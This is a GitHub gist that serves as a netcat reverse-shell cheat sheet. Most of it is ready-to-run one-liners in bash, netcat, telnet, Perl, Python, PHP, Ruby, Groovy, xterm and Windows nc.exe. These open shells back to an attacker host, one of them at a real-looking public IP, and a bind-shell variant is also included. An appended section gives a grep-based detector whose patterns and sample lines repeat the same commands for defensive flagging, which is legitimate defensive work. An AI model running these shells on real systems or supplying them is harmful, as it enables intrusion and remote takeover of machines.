Last active
September 13, 2024 16:01
Save alsunseri/8cfb94ec848691ba826c59473b363f41 to your computer and use it in GitHub Desktop.
nc netcat reverse shell
On the attack host, in the "local" terminal, start a listener (port 10000 is the port used in the examples below):
nc -l -v -p 10000
i.e. attacker$ nc -l -v -p 10000
(Traditional netcat needs -p for the listen port; OpenBSD nc and ncat also accept nc -l -v 10000. The -t flag is telnet negotiation and is not needed here.)
Then, on the "remote" victim computer, run this command.
Get this to execute on the victim host (assuming the victim does not have netcat). /dev/tcp is a bash feature, not a real device, so this must run under bash, not sh/dash:
bash -i >& /dev/tcp/[ATTACK_HOST_IP]/10000 0>&1
for example:
bash -i >& /dev/tcp/54.161.245.60/10000 0>&1
UNTESTED variation from the comments on https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
simple nc variant with two connections (untested; shown against localhost, so the attacker side is two listeners: nc -l -p 1233 to type commands into and nc -l -p 1234 to read the output; stderr is not carried):
nc localhost 1233 | /bin/sh | nc 127.0.0.1 1234
Netcat
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p 2>&1
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p 2>&1
Bash
/bin/bash -i >& /dev/tcp/attackerip/4444 0>&1
Or for Windows:
nc.exe 192.168.100.113 10000 -e cmd.exe
As soon as that command is executed, you will have a remote shell in the "local" terminal window.
Note: This will be CLEAR TEXT!! Anyone on the network path can read the session and inject into it; when that matters use an encrypted channel (for example ncat --ssl on both ends, or an SSH-based shell).
adapted and updated from
https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
Other resources:
https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://www.gnucitizen.org/blog/reverse-shell-with-bash/
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
Bash (adapted by pentestmonkey from https://www.gnucitizen.org/blog/reverse-shell-with-bash/)
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl (small no-feature version of http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python (the same code runs under python2 and python3)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
This assumes the TCP connection is file descriptor 3 in the spawned shell. If it does not work, try 4, 5 or 6 in place of 3.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
NC Netcat with -e (e.g. the nmap-ncat nc on AWS Linux 2; -e exists in traditional netcat and ncat but not in the OpenBSD nc shipped by Debian/Ubuntu, so use the mkfifo form below there)
nc -e /bin/sh 10.0.0.1 1234
or try this next one from Jeff Price
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
i.e. the same plumbing as a bind shell (listens on the victim on port 6000; connect with nc victimip 6000; 2>&1 added so errors reach the attacker too):
mkfifo mypipe ; cat mypipe|/bin/bash 2>&1|nc -l -p 6000 >mypipe
Java (untested; this is Groovy syntax, as on the pentestmonkey sheet)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm
xterm -bg black -fg white -display 10.0.0.1:1
To catch the incoming xterm, start an X server on your host (:1, which listens on TCP port 6001).
One way to do this is with Xnest (to be run on your system):
Xnest :1
You'll need to authorise the target to connect to you (command also run on your host). Keep the grant to the target's address: a bare xhost + lets any host draw on, and read input from, your display. Remove it afterwards with xhost -targetip.
xhost +targetip
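The defensive counterpart, as an added example that is not part of the gist: a shell check that flags process command lines matching the literal shapes of the one-liners listed above (input such as ps -eo args= output or auditd proctitle records; the sample lines below are constructed for the example, not taken from a real host). The patterns are deliberately the exact forms on this page, so anything obfuscated (base64 -d | sh, ${IFS} splitting, variables) walks straight past them; a real detection should also look for shells whose file descriptors 0, 1 and 2 are sockets.

```sh
#!/bin/sh
# Added example (not from the gist): grep-based flagging of the reverse-shell
# one-liners on this page in a list of process command lines.
# Input format assumed: one command line per line, as from `ps -eo args=`.

# One alternative per technique above. Literal shapes only; trivially evaded.
REVSHELL_PATTERN='/dev/tcp/[0-9A-Za-z.:-]+/[0-9]+'                                 # bash /dev/tcp
REVSHELL_PATTERN="$REVSHELL_PATTERN"'|nc(\.exe)? .*-e +(/bin/(ba)?sh|cmd\.exe)'   # nc -e
REVSHELL_PATTERN="$REVSHELL_PATTERN"'|mkfifo .*[|] *nc '                          # mkfifo ... | nc
REVSHELL_PATTERN="$REVSHELL_PATTERN"'|mknod .* p .*(nc|telnet) '                  # mknod pipe + nc/telnet
REVSHELL_PATTERN="$REVSHELL_PATTERN"'|fsockopen\(.*exec\('                        # PHP
REVSHELL_PATTERN="$REVSHELL_PATTERN"'|socket\.socket\(.*(subprocess|os\.dup2)'     # Python
REVSHELL_PATTERN="$REVSHELL_PATTERN"'|use Socket;.*exec\('                        # Perl
REVSHELL_PATTERN="$REVSHELL_PATTERN"'|TCPSocket\.open\(.*exec'                     # Ruby
REVSHELL_PATTERN="$REVSHELL_PATTERN"'|xterm .*-display '                          # xterm to attacker X server

# is_revshell_cmdline 'CMDLINE': exit 0 if the command line matches.
is_revshell_cmdline() {
    printf '%s\n' "$1" | grep -E -q -- "$REVSHELL_PATTERN"
}

# count_revshell_cmdlines: reads command lines on stdin, prints how many match.
count_revshell_cmdlines() {
    grep -E -c -- "$REVSHELL_PATTERN"
}

# Constructed sample (not from a real host): the page's one-liners plus benign noise.
SAMPLE_CMDLINES=$(cat <<'EOF'
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 4444 0</tmp/p | /bin/sh 1>/tmp/p 2>&1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);p=subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));exec("/bin/sh -i");'
nc.exe 192.168.100.113 10000 -e cmd.exe
xterm -bg black -fg white -display 10.0.0.1:1
nc -zv 10.0.0.1 22
bash -c 'echo started > /var/tmp/app.log'
curl -s https://example.com/health
EOF
)

# Stand-alone run: print the flagged lines, then the count (9 of the 12 above).
printf '%s\n' "$SAMPLE_CMDLINES" | grep -E -- "$REVSHELL_PATTERN"
printf '%s\n' "$SAMPLE_CMDLINES" | count_revshell_cmdlines
```

The three benign lines (a port probe with nc -zv, a shell writing a log file, a curl health check) are there to show the patterns demand the redirection or exec shape, not just the presence of nc or bash; the 9 flagged lines are the page's own one-liners.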